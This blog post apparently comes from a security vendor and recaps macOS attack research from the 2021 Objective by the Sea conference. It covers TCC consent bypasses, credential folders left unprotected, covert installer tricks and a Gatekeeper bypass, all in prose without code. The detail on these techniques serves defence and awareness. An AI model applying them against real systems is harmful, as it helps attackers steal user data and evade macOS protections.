The start of fall 2021 saw the fourth Objective by the Sea (OBTS) security conference, which is the only security conference to focus exclusively on Apple’s ecosystem. As such, it draws many of the top minds in the field. This year, those minds, having been starved of a good security conference for so long, were primed and ready to share all kinds of good information.

Conferences like this are important for understanding how attackers and their methods are evolving. Like all operating systems, macOS presents a moving target to attackers as it acquires new features and new forms of protection over time.

OBTS was a great opportunity to see how attacks against macOS are evolving. Here’s what I learned.

Transparency, Consent, and Control bypasses

Transparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data. For example, if an app wants to access something like your contacts or files in your Documents folder on a modern version of macOS, you will be asked to allow it before the app can see that data.

A TCC prompt asking the user to allow access to the Downloads folder
A TCC prompt asking the user to allow access to the Downloads folder

In recent years, Apple has been ratcheting down the power of the root user. Once upon a time, root was like God—it was the one and only user that could do everything on the system. It could create or destroy, and could see all. This hasn’t been the case for years, with things like System Integrity Protection (SIP) and the read-only signed system volume preventing even the root user from changing files across a wide swath of the hard drive.

TCC has been making inroads in further reducing the power of root over users’ data. If an app has root access, it still cannot even see—much less modify—a lot of the data in your user folder without your explicit consent.

This can cause some problems. For example, antivirus software such as Malwarebytes needs to be able to see everything it can in order to best protect you. But even though some Malwarebytes processes are running with root permissions, they still can’t see some files. Thus, apps like this often have to require the user to give a special permission called Full Disk Access (FDA). Without FDA, Malwarebytes and other security apps can’t fully protect you, but only you can give that access.

This is generally a good thing, as it puts you in control of access to your data. Malware often wants access to your sensitive data, either to steal it or to encrypt it and demand a ransom. TCC means that malware can’t automatically gain access to your data if it gets onto your system, and may be a part of the reason why we just don’t see ransomware on macOS.

TCC is a bit of a pain for us, and a common point of difficulty for users of our software, but it does mean that we can’t get access to some of your most sensitive files without your knowledge. This is assuming, of course, that you understood the FDA prompts and what you were agreeing to, which is debatable. Apple’s current process for assigning FDA doesn’t make that clear, and leaves it up to the app asking for FDA to explain the consequences. This makes tricking a user into giving access to something they shouldn’t pretty easy.

However, social engineering isn’t the only danger. Many researchers presenting at this year’s conference talked about bugs that allowed them to get around the Transparency, Consent, and Control (TCC) system in macOS, without getting user consent.

Andy Grant (@andywgrant) presented a vulnerability in which a remote attacker with root permissions can grant a malicious process whatever TCC permissions is desired. This process involving creating a new user on the system, then using that user to grant the permissions.

Csaba Fitzl (@theevilbit) gave a talk on a “Mount(ain) of Bugs,” in which he discussed another vulnerability involving mount points for disk image files. Normally, when you connect an external drive or double-click a disk image file, the volume is “mounted” (in other words, made available for access) within the /Volumes directory. In other words, if you connect a drive named “backup”, it would become accessible on the system at /Volumes/backup. This is the disk’s “mount point.”

Mountain of bugs
Title slide of Csaba Fitzl’s “Mount(ain) of Bugs” talk

Csaba was able to create a disk image file containing a custom TCC.db file. This file is a database that controls the TCC permissions that the user has granted to apps. Normally, the TCC.db file is readable, but cannot be modified by anything other than the system. However, by mounting this disk image while also setting the mount point to the path of the folder containing the TCC.db file, he was able to trick the system into accepting his arbitrary TCC.db file as if it were the real one, allowing him to change TCC permissions however he desired.

There were other TCC bypasses mentioned as well, but perhaps the most disturbing is the fact that there’s a fairly significant amount of highly sensitive data that is not protected by TCC at all. Any malware can collect that data without difficulty.

What is this data, you ask? One example is the .ssh folder in the user’s home folder. SSH is a program used for securely gaining command line access to a remote Mac, Linux, or other Unix system, and the .ssh folder is the location where certificates used to authenticate the connection are stored. This makes the data in that folder a high-value target for an attacker looking to move laterally within an organization.

There are other similar folders in the same location that can contain credentials for other services, such as AWS or Azure, which are similarly wide open. Also unprotected are the folders where data is stored for any browser other than Safari, which can include credentials if you use a browser’s built-in password manager.

Now, admittedly, there could be some technical challenges to protecting some or all of this data under the umbrella of TCC. However, the average IT admin is probably more concerned about SSH keys or other credentials being harvested than in an attacker being able to peek inside your Downloads folder.

Attackers are doing interesting things with installers

Installers are, of course, important for malware to get installed on a system. Often, users must be tricked into opening something in order to infect their machine. There are a variety of techniques attackers can use that were discussed.

One common method for doing this is to use Apple installer packages (.pkg files), but this is not particularly stealthy. Knowledgeable and cautious folks may choose to examine the installer package, as well as the preinstall and postinstall scripts (designed to run exactly when you’d expect by the names), to make sure nothing untoward is going on.

However, citing an example used in the recent Silver Sparrow malware, Tony Lambert (@ForensicITGuy) discussed a sneaky method for getting malware installed: The oft overlooked Distribution file.

The Distribution file is found inside Apple installer packages, and is meant to convey information and options for the installer. However, JavaScript code can also be inserted in this file, to be run at the beginning of the installation, meant to be used to determine if the system meets the requirements for the software being installed.

In the case of Silver Sparrow, however, the installer used this script to download and install the malware covertly. If you clicked Continue in the dialog shown below, you’d be infected even if you then opted not to continue with the installation.

An Apple installer asking the user to allow a program to run to determine if the software can be installed.
Click Continue to install malware

Another interesting trick Tony discussed was the use of payload-free installers. These are installers that actually don’t contain any files to be installed, and are really just a wrapper for a script that does all the installation (likely via the preinstall script, but also potentially via Distribution).

Normal installer scripts will leave behind a “receipt,” which is a file containing a record of when the installation happened and what was installed where. However, installers that lack an official payload, and that download everything via scripts, do not leave behind such a receipt. This means that an IT admin or security researcher would be missing key information that could reveal when and where malware had been installed.

Chris Ross (@xorrior) discussed some of these same techniques, but also delved into installer plugins. These plugins are used within installer packages to create custom “panes” in the installer. (Most installers go through a specific series of steps prescribed by Apple, but some developers add additional steps via custom code.)

These installer plugins are written in Objective-C, rather than scripting languages, and therefore can be more powerful. Best of all, these plugins are very infrequently used, and thus are likely to be overlooked by many security researchers. Yet Chris was able to demonstrate techniques that could be used by such a plugin to drop a malicious payload on the system.

Yet another issue was presented in Cedric Owens’ (@cedowens) talk. Although not related to an installer package (.pkg file), a vulnerability in macOS (CVE-2021-30657) could allow a Mac app to entirely bypass Gatekeeper, which is the core of many of Apple’s security features.

On macOS, any time you open an app downloaded from the Internet, you should at a minimum see a warning telling you that you’re opening an app (in case it was something masquerading as a Word document, or something similar). If there’s anything wrong with the app, Gatekeeper can go one step further and prevent you from opening it at all.

By constructing an app that was missing some of the specific components usually considered essential, an attacker could create an app that was fully functional, but that would not trigger any warnings when launched. (Some variants of the Shlayer adware have been seen using this technique.)